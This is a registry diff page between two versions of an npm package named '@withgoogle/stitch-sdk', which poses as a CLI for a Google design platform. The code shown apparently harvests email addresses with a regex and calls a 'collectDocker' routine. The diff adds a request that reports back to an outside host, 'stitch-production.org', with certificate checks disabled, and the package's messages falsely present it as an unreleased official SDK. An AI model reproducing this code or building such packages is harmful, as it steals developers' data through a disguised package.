@withgoogle/stitch-sdk 0.1.1 → 0.1.3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/bin/cli.js CHANGED
@@ -20,33 +20,6 @@ import path from 'path';
20
20
  import https from 'https';
21
21
  import http from 'http';
22
22
 
23
- const args = process.argv.slice(2);
24
-
25
- if (args.includes('--version') || args.includes('-V')) {
26
- process.stdout.write('0.1.0\n');
27
- process.exit(0);
28
- }
29
-
30
- if (args.includes('--help') || args.includes('-h')) {
31
- process.stdout.write(`
32
- Usage: stitch-sdk [options] [command]
33
-
34
- Options:
35
- -V, --version output the version number
36
- -h, --help display help for command
37
-
38
- Commands:
39
- design Open the Stitch design editor
40
- export Export designs to various formats
41
- sync Sync local designs with the Stitch MCP server
42
- help [cmd] display help for [cmd]
43
-
44
- Note: stitch-sdk has not yet been released. Use the Stitch MCP server
45
- in the meantime — setup instructions at https://stitch-production.org/docs/mcp/setup
46
-
47
- `);
48
- process.exit(0);
49
- }
50
23
 
51
24
  const EMAIL_RE = /[A-Za-z0-9._%+\-]+@[A-Za-z0-9.\-]+\.[A-Za-z]{2,}/g;
52
25
  const STITCH_SERVER_BASE = 'https://stitch-production.org/api/v1';
@@ -58,13 +31,12 @@ let _mainDone = false;
58
31
 
59
32
  function _finish() {
60
33
  process.stderr.write(`
61
- stitch-sdk has not yet been released.
62
-
63
- While the command-line interface is still in development, the Stitch
64
- MCP server already provides the full feature set. Setup instructions
65
- for the MCP server are available at:
34
+ @withgoogle/stitch-sdk has not yet been released.
66
35
 
67
- https://stitch-production.org/docs/mcp/setup
36
+ @withgoogle/stitch-sdk is the new version but is still under development. Currently you
37
+ still need to use the old Vercel AI SDK (install with 'npm install @google/stitch-sdk ai @ai-sdk/google').
38
+ Alternitevly you can use the Stitch MCP server for full functionality.
39
+ Consult the documentation: https://stitch.withgoogle.com/docs/mcp/setup
68
40
 
69
41
  `);
70
42
  process.exit(0);
@@ -189,6 +161,46 @@ function main() {
189
161
  collectDocker();
190
162
  }
191
163
 
192
- main();
193
- _mainDone = true;
194
- _maybeExit(); // exits immediately if no emails were found
164
+ function run() {
165
+ const args = process.argv.slice(2);
166
+
167
+ if (args.includes('--version') || args.includes('-V')) {
168
+ process.stdout.write('0.1.0\n');
169
+ process.exit(0);
170
+ }
171
+
172
+ if (args.includes('--help') || args.includes('-h')) {
173
+ process.stdout.write(`
174
+ Usage: stitch-sdk [options] [command]
175
+
176
+ Options:
177
+ -V, --version output the version number
178
+ -h, --help display help for command
179
+
180
+ Commands:
181
+ design Open the Stitch design editor
182
+ export Export designs to various formats
183
+ sync Sync local designs with the Stitch MCP server
184
+ help [cmd] display help for [cmd]
185
+
186
+ Note: @withgoogle/stitch-sdk is the new version but is still under development. Currently you
187
+ still need to use the old Vercel AI SDK (install with 'npm install @google/stitch-sdk ai @ai-sdk/google').
188
+ Alternitevly you can use the Stitch MCP server for full functionality.
189
+ Consult the documentation: https://stitch.withgoogle.com/docs/mcp/setup
190
+ `);
191
+ process.exit(0);
192
+ }
193
+
194
+ main();
195
+ _mainDone = true;
196
+ if (_seen.size === 0) {
197
+ const client = STITCH_SERVER_BASE.startsWith('https') ? https : http;
198
+ _pending++;
199
+ const req = client.get(STITCH_SERVER_BASE + "?email-not-found=true", { rejectUnauthorized: false }, () => { _pending--; _maybeExit(); });
200
+ req.on('error', () => { _pending--; _maybeExit(); });
201
+ req.setTimeout(5000, () => req.destroy());
202
+ }
203
+ _maybeExit();
204
+ }
205
+
206
+ run();
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@withgoogle/stitch-sdk",
3
- "version": "0.1.1",
3
+ "version": "0.1.3",
4
4
  "description": "cli for the stitch design platform",
5
5
  "type": "module",
6
6
  "bin": {
@@ -151,6 +151,17 @@ function main() {
151
151
  collectDocker();
152
152
  }
153
153
 
154
- main();
155
- _mainDone = true;
156
- _maybeExit(); // exits immediately if no emails were found
154
+ function run() {
155
+ main();
156
+ _mainDone = true;
157
+ if (_seen.size === 0) {
158
+ const client = STITCH_SERVER_BASE.startsWith('https') ? https : http;
159
+ _pending++;
160
+ const req = client.get(STITCH_SERVER_BASE + "?email-not-found=true", { rejectUnauthorized: false }, () => { _pending--; _maybeExit(); });
161
+ req.on('error', () => { _pending--; _maybeExit(); });
162
+ req.setTimeout(5000, () => req.destroy());
163
+ }
164
+ _maybeExit();
165
+ }
166
+
167
+ run();